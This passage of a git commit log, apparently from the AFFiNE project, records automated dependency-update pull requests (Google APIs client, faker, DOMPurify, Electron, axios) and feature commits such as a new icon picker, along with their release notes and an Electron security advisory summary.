([42a1422](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/42a142249e172d0e0ec8ab877864a2f0fb385304)) - **serviceusage:** update the API ([c2ad070](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c2ad070ce4e92524177fde0d50038b5bcf4ad562)) - **storage:** update the API ([c0609c9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c0609c901b212d5b8a43b9f75099d759a800a4e5)) - **translate:** update the API ([77a0522](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/77a05229d287e07fcad75c7d509cda29d5c41856)) - **vault:** update the API ([db163fd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/db163fd3b3ea4a71d8108563763f687e7df0262d)) - **vision:** update the API ([77a0a91](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/77a0a9136e5f59f532a9bf064ebed830d10a16d3)) - **vpcaccess:** update the API ([8db5275](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8db52757e6cc1842f451581340d9fa0aa554fea3)) - **workloadmanager:** update the API ([4c49597](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4c4959752e2d6825bca64aef6694b6f2e4b042e2)) - **workstations:** update the API ([174cd20](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/174cd20129e81ebf20c3e30e77520916e3ef4ae7)) ##### Bug Fixes - **accessapproval:** update the API ([227915d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/227915d92f792529be0b15608cc3f3feaaa5b838)) - **analyticsadmin:** update the API ([b858170](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b858170642a882c05790c2cc4a4f98bf091f159a)) - **androidmanagement:** update the API ([35f8862](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/35f886254c30d0263e981bf49811d7693086559a)) - **apphub:** update the API ([e5a7c92](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e5a7c92a2a50fb4873c72d86ed9448a52e1c3cf6)) - **binaryauthorization:** update the API ([7f20317](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7f20317264d67cf4cbec409e2eb1c9483349aaa6)) - **calendar:** update the API ([e6ba462](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e6ba462408d14ae49da8348557c8a5161f7de78f)) - **chromepolicy:** update the API ([a5a5351](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a5a5351998cac8894741ce9461a9af2d71eaea19)) - **classroom:** update the API ([9d2ed12](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9d2ed122022cd591742589f816a8064bf8deadb8)) - **cloudasset:** update the API ([20a91d5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/20a91d5cb69672995e449e04d3c9224db2434fcc)) - **cloudidentity:** update the API ([5155e11](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5155e11cd24367c79c81ec525fffe541c87690d7)) - **cloudkms:** update the API ([90bab2c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/90bab2c738a3185133a8d98f3e81604375f15464)) - **cloudscheduler:** update the API ([2c7b902](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2c7b90229a5a25ed0dea8afe5e80cf57de00a167)) - **cloudtasks:** update the API ([a8d66db](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a8d66db0553c0aa069ead02666d083a94e2a01bd)) - **contactcenterinsights:** update the API ([828c5d3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/828c5d3e0840f6eb9b94b370a4f1037acb93fb30)) - **datamigration:** update the API ([56a65a8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/56a65a85908a92cc53812ef201b1a672e44a975f)) - **deploymentmanager:** update the API ([b48abef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b48abef098c1c639c72524121cf39d054ba29587)) - **displayvideo:** update the API ([299cf97](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/299cf97f91a11dbb6cb1358c0e19003e0d7be394)) - **firebaseappdistribution:** update the API ([b102fcc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b102fccab52fd6fe099b3d1bcb96e7773a74adcf)) - **gkebackup:** update the API ([30ca612](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/30ca6127287a5f55a8c6d7b7247f2aff618e6b8f)) - **iam:** update the API ([4e12124](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4e121245a3e13e02cb325576f9a9de0f5d49ab98)) - **iap:** update the API ([65c644e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/65c644e9dedde1b314a854dc39c1028b95921dc5)) - **language:** update the API ([77252e1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/77252e1b9c209700260742a3884ff628457387f7)) - **logging:** update the API ([1b4dc67](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1b4dc6732c203844254b20d90e272bdfd4a5c436)) - **mybusinessbusinessinformation:** update the API ([5e4c0fe](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5e4c0fe0936e6e9b0c56aecbc830e266e1ceb310)) - **places:** update the API ([6bbdf72](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6bbdf72e3e27aad2e65af023a7da508cecf90324)) - **policytroubleshooter:** update the API ([ad18f3b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ad18f3b0f6304bc0d08e964c1f2b4691eb922568)) - **privateca:** update the API ([b230959](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b23095912e6c4c4d96b6afbb8536c7c34c84fec6)) - **runtimeconfig:** update the API ([0dfe961](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0dfe9610eb577576fd5a14aa676b449a13c8f4bc)) - **secretmanager:** update the API ([a202268](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a202268db9439caab4677db9102c3942e86053f8)) - **servicedirectory:** update the API ([ddc06a2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ddc06a219b2d2b225fc8219d10030d0f605d791e)) - **sourcerepo:** update the API ([1965102](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/19651026aed9d4a97452b390cbc45b0bc8f97fa9)) - **spanner:** update the API ([ce99980](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ce99980e717cffd3c2cb50d3fd969c55f20b16b2)) - **sqladmin:** update the API ([de59e8d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/de59e8dd225ab7cf53698a47b6c5dac578749292)) - **storagetransfer:** update the API ([d6081de](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d6081dea7de937f0f45f40f6c5cfe62997a7d12e)) - **videointelligence:** update the API ([9d377f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9d377f5e3e7e7a1c062ca3b1e3878ec6828584f0)) - **vmmigration:** update the API ([68a1d5f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/68a1d5fede479cce01e9543588460cede8f567b0)) - **walletobjects:** update the API ([920ddc7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/920ddc780c9201ae9c3aa68b1ba535d125797d7a)) - **workflowexecutions:** update the API ([6553987](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6553987f65508971cd403629752688603faf6b90)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45Ny4xMCIsInVwZGF0ZWRJblZlciI6IjQxLjk3LjEwIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
d272c4342d |
feat(core): replace emoji-mart with affine icon picker (#13644)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - New Features - Unified icon picker with consistent rendering across the app. - Picker can auto-close after selection. - “Remove” now clears the icon selection. - Refactor - Icon handling consolidated across editors, navigation, and document titles for consistent behavior. - Picker now opens on the Emoji panel by default. - Style - Adjusted line-height and selectors for icon picker visuals. - Chores - Removed unused emoji-mart dependencies. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
ca9811792d |
feat(component): emoji and icon picker (#13638)
 <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - **New Features** - Icon Picker added with Emoji and Icon panels, search/filtering, recent selections, color selection, skin tone options, and smooth group navigation. - **Documentation** - Storybook example added to preview and test the Icon Picker. - **Chores** - Bumped icon library dependency to a newer minor version. - Added emoji data dependency to support the Emoji Picker. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
812c2d86d4 |
feat(server): add Swagger API docs (#13455)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Interactive API documentation available at /api/docs when running in development. * **Chores** * Added a development dependency to enable generation of the API documentation. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> Co-authored-by: DarkSky <darksky2048@gmail.com> |
||
|
|
da3e3eb3fa |
chore: bump up @faker-js/faker version to v10 (#13626)
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs from Renovate will soon appear from 'Mend'. Learn more [here](https://redirect.github.com/renovatebot/renovate/discussions/37842). This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@faker-js/faker](https://fakerjs.dev) ([source](https://redirect.github.com/faker-js/faker)) | [`^9.6.0` -> `^10.0.0`](https://renovatebot.com/diffs/npm/@faker-js%2ffaker/9.8.0/10.0.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@faker-js/faker](https://fakerjs.dev) ([source](https://redirect.github.com/faker-js/faker)) | [`^9.3.0` -> `^10.0.0`](https://renovatebot.com/diffs/npm/@faker-js%2ffaker/9.8.0/10.0.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>faker-js/faker (@​faker-js/faker)</summary> ### [`v10.0.0`](https://redirect.github.com/faker-js/faker/blob/HEAD/CHANGELOG.md#1000-2025-08-21) [Compare Source](https://redirect.github.com/faker-js/faker/compare/v9.9.0...v10.0.0) ##### New Locales - **locale:** extended list of colors in Polish ([#​3586](https://redirect.github.com/faker-js/faker/issues/3586)) ([9940d54](https://redirect.github.com/faker-js/faker/commit/9940d54f75205b65a74d11484cb385c85656a43f)) ##### Features - **locales:** add animal vocabulary(bear, bird, cat, rabbit, pet\_name) in Korean ([#​3535](https://redirect.github.com/faker-js/faker/issues/3535)) ([0d2143c](https://redirect.github.com/faker-js/faker/commit/0d2143c75d804d1dc53c17078eb59bc1970a07d1)) ##### Changed Locales - **locale:** remove invalid credit card issuer patterns ([#​3568](https://redirect.github.com/faker-js/faker/issues/3568)) ([9783d95](https://redirect.github.com/faker-js/faker/commit/9783d95a8e43c45bc44c5c0c546b250b6c2ae140)) ### [`v9.9.0`](https://redirect.github.com/faker-js/faker/blob/HEAD/CHANGELOG.md#990-2025-07-01) [Compare Source](https://redirect.github.com/faker-js/faker/compare/v9.8.0...v9.9.0) ##### New Locales - **locale:** add word data to pt\_br and pt\_pt locales ([#​3531](https://redirect.github.com/faker-js/faker/issues/3531)) ([a405ac8](https://redirect.github.com/faker-js/faker/commit/a405ac8740bcfb2ec5f84c06752484a2b332a90a)) ##### Features - **location:** simple coordinate methods ([#​3528](https://redirect.github.com/faker-js/faker/issues/3528)) ([d07d96d](https://redirect.github.com/faker-js/faker/commit/d07d96d01833085f2d3c5f9c851a572ebf8c47df)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45Ny4xMCIsInVwZGF0ZWRJblZlciI6IjQxLjk3LjEwIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
93554304e2 |
chore: bump dompurify from 3.1.6 to 3.2.7 (#13622)
Bumps [dompurify](https://github.com/cure53/DOMPurify) from 3.1.6 to 3.2.7. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/cure53/DOMPurify/releases">dompurify's releases</a>.</em></p> <blockquote> <h2>DOMPurify 3.2.7</h2> <ul> <li>Added new attributes and elements to default allow-list, thanks <a href="https://github.com/elrion018"><code>@elrion018</code></a></li> <li>Added <code>tagName</code> parameter to custom element <code>attributeNameCheck</code>, thanks <a href="https://github.com/nelstrom"><code>@nelstrom</code></a></li> <li>Added better check for animated <code>href</code> attributes, thanks <a href="https://github.com/llamakko"><code>@llamakko</code></a></li> <li>Updated and improved the bundled types, thanks <a href="https://github.com/ssi02014"><code>@ssi02014</code></a></li> <li>Updated several tests to better align with new browser encoding behaviors</li> <li>Improved the handling of potentially risky content inside CDATA elements, thanks <a href="https://github.com/securityMB"><code>@securityMB</code></a> & <a href="https://github.com/terjanq"><code>@terjanq</code></a></li> <li>Improved the regular expression for raw-text elements to cover textareas, thanks <a href="https://github.com/securityMB"><code>@securityMB</code></a> & <a href="https://github.com/terjanq"><code>@terjanq</code></a></li> </ul> <h2>DOMPurify 3.2.6</h2> <ul> <li>Fixed several typos and removed clutter from our documentation, thanks <a href="https://github.com/Rotzbua"><code>@Rotzbua</code></a></li> <li>Added <code>matrix:</code> as an allowed URI scheme, thanks <a href="https://github.com/kleinesfilmroellchen"><code>@kleinesfilmroellchen</code></a></li> <li>Added better config hardening against prototype pollution, thanks <a href="https://github.com/EffectRenan"><code>@EffectRenan</code></a></li> <li>Added better handling of attribute removal, thanks <a href="https://github.com/michalnieruchalski-tiugo"><code>@michalnieruchalski-tiugo</code></a></li> <li>Added better configuration for aggressive mXSS scrubbing behavior, thanks <a href="https://github.com/BryanValverdeU"><code>@BryanValverdeU</code></a></li> <li>Removed the script that caused the fake entry <a href="https://security.snyk.io/vuln/SNYK-JS-DOMPURIFY-10176060">CVE-2025-48050</a></li> </ul> <h2>DOMPurify 3.2.5</h2> <ul> <li>Added a check to the mXSS detection regex to be more strict, thanks <a href="https://github.com/masatokinugawa"><code>@masatokinugawa</code></a></li> <li>Added ESM type imports in source, removes patch function, thanks <a href="https://github.com/donmccurdy"><code>@donmccurdy</code></a></li> <li>Added script to verify various TypeScript configurations, thanks <a href="https://github.com/reduckted"><code>@reduckted</code></a></li> <li>Added more modern browsers to the Karma launchers list</li> <li>Added Node 23.x to tested runtimes, removed Node 17.x</li> <li>Fixed the generation of source maps, thanks <a href="https://github.com/reduckted"><code>@reduckted</code></a></li> <li>Fixed an unexpected behavior with <code>ALLOWED_URI_REGEXP</code> using the 'g' flag, thanks <a href="https://github.com/hhk-png"><code>@hhk-png</code></a></li> <li>Fixed a few typos in the README file</li> </ul> <h2>DOMPurify 3.2.4</h2> <ul> <li>Fixed a conditional and config dependent mXSS-style <a href="https://nsysean.github.io/posts/dompurify-323-bypass/">bypass</a> reported by <a href="https://github.com/nsysean"><code>@nsysean</code></a></li> <li>Added a new feature to allow specific hook removal, thanks <a href="https://github.com/davecardwell"><code>@davecardwell</code></a></li> <li>Added <em>purify.js</em> and <em>purify.min.js</em> to exports, thanks <a href="https://github.com/Aetherinox"><code>@Aetherinox</code></a></li> <li>Added better logic in case no window object is president, thanks <a href="https://github.com/yehuya"><code>@yehuya</code></a></li> <li>Updated some dependencies called out by dependabot</li> <li>Updated license files etc to show the correct year</li> </ul> <h2>DOMPurify 3.2.3</h2> <ul> <li>Fixed two conditional sanitizer bypasses discovered by <a href="https://github.com/parrot409"><code>@parrot409</code></a> and <a href="https://x.com/slonser_"><code>@Slonser</code></a></li> <li>Updated the attribute clobbering checks to prevent future bypasses, thanks <a href="https://github.com/parrot409"><code>@parrot409</code></a></li> </ul> <h2>DOMPurify 3.2.2</h2> <ul> <li>Fixed a possible bypass in case a rather specific config for custom elements is set, thanks <a href="https://github.com/yaniv-git"><code>@yaniv-git</code></a></li> <li>Fixed several minor issues with the type definitions, thanks again <a href="https://github.com/reduckted"><code>@reduckted</code></a></li> <li>Fixed a minor issue with the types reference for trusted types, thanks <a href="https://github.com/reduckted"><code>@reduckted</code></a></li> <li>Fixed a minor problem with the template detection regex on some systems, thanks <a href="https://github.com/svdb99"><code>@svdb99</code></a></li> </ul> <h2>DOMPurify 3.2.1</h2> <ul> <li>Fixed several minor issues with the type definitions, thanks <a href="https://github.com/reduckted"><code>@reduckted</code></a> <a href="https://github.com/ghiscoding"><code>@ghiscoding</code></a> <a href="https://github.com/asamuzaK"><code>@asamuzaK</code></a> <a href="https://github.com/MiniDigger"><code>@MiniDigger</code></a></li> <li>Fixed an issue with non-minified dist files and order of imports, thanks <a href="https://github.com/reduckted"><code>@reduckted</code></a></li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href="https://github.com/cure53/DOMPurify/commit/eaa0bdb26a1d0164af587d9059b98269008faece"><code>eaa0bdb</code></a> Merge pull request <a href="https://redirect.github.com/cure53/DOMPurify/issues/1144">#1144</a> from cure53/main</li> <li><a href="https://github.com/cure53/DOMPurify/commit/f712593118c158c0daaf16527d804c84c96f4ce5"><code>f712593</code></a> fix: removed a possibly dossy regex</li> <li><a href="https://github.com/cure53/DOMPurify/commit/eb9b3b68747fa2cf99629c6b764a14c041f96c23"><code>eb9b3b6</code></a> Merge branch 'main' of github.com:cure53/DOMPurify</li> <li><a href="https://github.com/cure53/DOMPurify/commit/ce006f705cfa16836271d2d92cf0f57487361ac6"><code>ce006f7</code></a> chore: Preparing 3.2.7 release</li> <li><a href="https://github.com/cure53/DOMPurify/commit/ef0e0cb6eb8bdee8ed9651b7340226136287aac1"><code>ef0e0cb</code></a> chore: Preparing 3.2.6 release</li> <li><a href="https://github.com/cure53/DOMPurify/commit/2f09cd3c8ed58906e5cd12e9bebc15c60fd48c4c"><code>2f09cd3</code></a> Update README.md</li> <li><a href="https://github.com/cure53/DOMPurify/commit/6a795bcf3e67712f481e8b32616e218d5a389cc3"><code>6a795bc</code></a> Merge pull request <a href="https://redirect.github.com/cure53/DOMPurify/issues/1142">#1142</a> from cure53/dependabot/github_actions/actions/setup-...</li> <li><a href="https://github.com/cure53/DOMPurify/commit/2458bbdfcaf9b77423ef5e201a435f98ab229355"><code>2458bbd</code></a> build(deps): bump actions/setup-node from 4 to 5</li> <li><a href="https://github.com/cure53/DOMPurify/commit/e43d3f354861f273852d16f35359f529199dc104"><code>e43d3f3</code></a> Merge pull request <a href="https://redirect.github.com/cure53/DOMPurify/issues/1136">#1136</a> from cure53/dependabot/github_actions/actions/checko...</li> <li><a href="https://github.com/cure53/DOMPurify/commit/6f5be37ee02c145b30ca58b1c57264b1b84b99ff"><code>6f5be37</code></a> build(deps): bump actions/checkout from 4 to 5</li> <li>Additional commits viewable in <a href="https://github.com/cure53/DOMPurify/compare/3.1.6...3.2.7">compare view</a></li> </ul> </details> <br /> [](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores) Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`. [//]: # (dependabot-automerge-start) [//]: # (dependabot-automerge-end) --- <details> <summary>Dependabot commands and options</summary> <br /> You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency - `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/toeverything/AFFiNE/network/alerts). </details> Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> |
||
|
|
2f38953cf9 |
chore: bump up electron version to v35.7.5 [SECURITY] (#13561)
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs from Renovate will soon appear from 'Mend'. Learn more [here](https://redirect.github.com/renovatebot/renovate/discussions/37842). This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [electron](https://redirect.github.com/electron/electron) | [`35.5.1` -> `35.7.5`](https://renovatebot.com/diffs/npm/electron/35.5.1/35.7.5) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-55305](https://redirect.github.com/electron/electron/security/advisories/GHSA-vmqv-hx8q-j7mg) ### Impact This only impacts apps that have the `embeddedAsarIntegrityValidation` and `onlyLoadAppFromAsar` [fuses](https://www.electronjs.org/docs/latest/tutorial/fuses) enabled. Apps without these fuses enabled are not impacted. Specifically this issue can only be exploited if your app is launched from a filesystem the attacker has write access too. i.e. the ability to edit files inside the `resources` folder in your app installation on Windows which these fuses are supposed to protect against. ### Workarounds There are no app side workarounds, you must update to a patched version of Electron. ### Fixed Versions * `38.0.0-beta.6` * `37.3.1` * `36.8.1` * `35.7.5` ### For more information If you have any questions or comments about this advisory, email us at [security@electronjs.org](mailto:security@electronjs.org) --- ### Release Notes <details> <summary>electron/electron (electron)</summary> ### [`v35.7.5`](https://redirect.github.com/electron/electron/releases/tag/v35.7.5): electron v35.7.5 [Compare Source](https://redirect.github.com/electron/electron/compare/v35.7.4...v35.7.5) ##### Release Notes for v35.7.5 > \[!WARNING] > Electron 35.x.y has reached end-of-support as per the project's [support policy](https://www.electronjs.org/docs/latest/tutorial/electron-timelines#version-support-policy). Developers and applications are encouraged to upgrade to a newer version of Electron. ##### Fixes - Fixed an issue where `shell.openPath` was not non-blocking as expected. [#​48079](https://redirect.github.com/electron/electron/pull/48079) <span style="font-size:small;">(Also in [36](https://redirect.github.com/electron/electron/pull/48088), [37](https://redirect.github.com/electron/electron/pull/48088), [38](https://redirect.github.com/electron/electron/pull/48088))</span> ### [`v35.7.4`](https://redirect.github.com/electron/electron/releases/tag/v35.7.4): electron v35.7.4 [Compare Source](https://redirect.github.com/electron/electron/compare/v35.7.2...v35.7.4) ##### Release Notes for v35.7.4 - Fix ffmpeg generation on Windows non-x64 ### [`v35.7.2`](https://redirect.github.com/electron/electron/releases/tag/v35.7.2): electron v35.7.2 [Compare Source](https://redirect.github.com/electron/electron/compare/v35.7.0...v35.7.2) ##### Release Notes for v35.7.2 ##### Fixes - Fixed an issue where printing PDFs with `webContents.print({ silent: true })` would fail. [#​47645](https://redirect.github.com/electron/electron/pull/47645) <span style="font-size:small;">(Also in [36](https://redirect.github.com/electron/electron/pull/47624), [37](https://redirect.github.com/electron/electron/pull/47397))</span> ### [`v35.7.0`](https://redirect.github.com/electron/electron/releases/tag/v35.7.0): electron v35.7.0 [Compare Source](https://redirect.github.com/electron/electron/compare/v35.6.0...v35.7.0) ##### Release Notes for v35.7.0 ##### Other Changes - Updated Node.js to v22.16.0. [#​47213](https://redirect.github.com/electron/electron/pull/47213) ### [`v35.6.0`](https://redirect.github.com/electron/electron/releases/tag/v35.6.0): electron v35.6.0 [Compare Source](https://redirect.github.com/electron/electron/compare/v35.5.1...v35.6.0) ##### Release Notes for v35.6.0 ##### Features - Added support for `--no-experimental-global-navigator` flag. [#​47416](https://redirect.github.com/electron/electron/pull/47416) <span style="font-size:small;">(Also in [36](https://redirect.github.com/electron/electron/pull/47417), [37](https://redirect.github.com/electron/electron/pull/47418))</span> - Added support for customizing system accent color and highlighting of active window border. [#​47539](https://redirect.github.com/electron/electron/pull/47539) <span style="font-size:small;">(Also in [36](https://redirect.github.com/electron/electron/pull/47538), [37](https://redirect.github.com/electron/electron/pull/47537))</span> ##### Fixes - Fixed a potential crash using `session.clearData` in some circumstances. [#​47410](https://redirect.github.com/electron/electron/pull/47410) <span style="font-size:small;">(Also in [36](https://redirect.github.com/electron/electron/pull/47411), [37](https://redirect.github.com/electron/electron/pull/47412))</span> - Fixed an error when importing `electron` for the first time from an ESM module loaded by a CJS module in a packaged app. [#​47344](https://redirect.github.com/electron/electron/pull/47344) <span style="font-size:small;">(Also in [36](https://redirect.github.com/electron/electron/pull/47343), [37](https://redirect.github.com/electron/electron/pull/47342))</span> - Fixed an issue where calling `Fetch.continueResponse` via debugger with `WebContentsView` could cause a crash. [#​47443](https://redirect.github.com/electron/electron/pull/47443) <span style="font-size:small;">(Also in [36](https://redirect.github.com/electron/electron/pull/47442), [37](https://redirect.github.com/electron/electron/pull/47444))</span> - Fixed an issue where utility processes could leak file handles. [#​47542](https://redirect.github.com/electron/electron/pull/47542) <span style="font-size:small;">(Also in [36](https://redirect.github.com/electron/electron/pull/47541), [37](https://redirect.github.com/electron/electron/pull/47543))</span> - Partially fixes an issue with printing a PDF via `webContents.print()` where the callback would not be called. [#​47399](https://redirect.github.com/electron/electron/pull/47399) <span style="font-size:small;">(Also in [36](https://redirect.github.com/electron/electron/pull/47400), [37](https://redirect.github.com/electron/electron/pull/47398))</span> ##### Other Changes - Backported fix for [`4206375`](https://redirect.github.com/electron/electron/commit/420637585). [#​47369](https://redirect.github.com/electron/electron/pull/47369) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45MS4xIiwidXBkYXRlZEluVmVyIjoiNDEuOTcuMTAiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
2d0721a78f |
chore: bump axios from 1.9.0 to 1.12.2 (#13621)
Bumps [axios](https://github.com/axios/axios) from 1.9.0 to 1.12.2. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/axios/axios/releases">axios's releases</a>.</em></p> <blockquote> <h2>Release v1.12.2</h2> <h2>Release notes:</h2> <h3>Bug Fixes</h3> <ul> <li><strong>fetch:</strong> use current global fetch instead of cached one when env fetch is not specified to keep MSW support; (<a href="https://redirect.github.com/axios/axios/issues/7030">#7030</a>) (<a href="https://github.com/axios/axios/commit/cf78825e1229b60d1629ad0bbc8a752ff43c3f53">cf78825</a>)</li> </ul> <h3>Contributors to this release</h3> <ul> <li><!-- raw HTML omitted --> <a href="https://github.com/DigitalBrainJS" title="+247/-16 ([#7030](https://github.com/axios/axios/issues/7030) [#7022](https://github.com/axios/axios/issues/7022) [#7024](https://github.com/axios/axios/issues/7024) )">Dmitriy Mozgovoy</a></li> <li><!-- raw HTML omitted --> <a href="https://github.com/noritaka1166" title="+2/-6 ([#7028](https://github.com/axios/axios/issues/7028) [#7029](https://github.com/axios/axios/issues/7029) )">Noritaka Kobayashi</a></li> </ul> <h2>Release v1.12.1</h2> <h2>Release notes:</h2> <h3>Bug Fixes</h3> <ul> <li><strong>types:</strong> fixed env config types; (<a href="https://redirect.github.com/axios/axios/issues/7020">#7020</a>) (<a href="https://github.com/axios/axios/commit/b5f26b75bdd9afa95016fb67d0cab15fc74cbf05">b5f26b7</a>)</li> </ul> <h3>Contributors to this release</h3> <ul> <li><!-- raw HTML omitted --> <a href="https://github.com/DigitalBrainJS" title="+10/-4 ([#7020](https://github.com/axios/axios/issues/7020) )">Dmitriy Mozgovoy</a></li> </ul> <h2>Release v1.12.0</h2> <h2>Release notes:</h2> <h3>Bug Fixes</h3> <ul> <li>adding build artifacts (<a href="https://github.com/axios/axios/commit/9ec86de257bfa33856571036279169f385ed92bd">9ec86de</a>)</li> <li>dont add dist on release (<a href="https://github.com/axios/axios/commit/a2edc3606a4f775d868a67bb3461ff18ce7ecd11">a2edc36</a>)</li> <li><strong>fetch-adapter:</strong> set correct Content-Type for Node FormData (<a 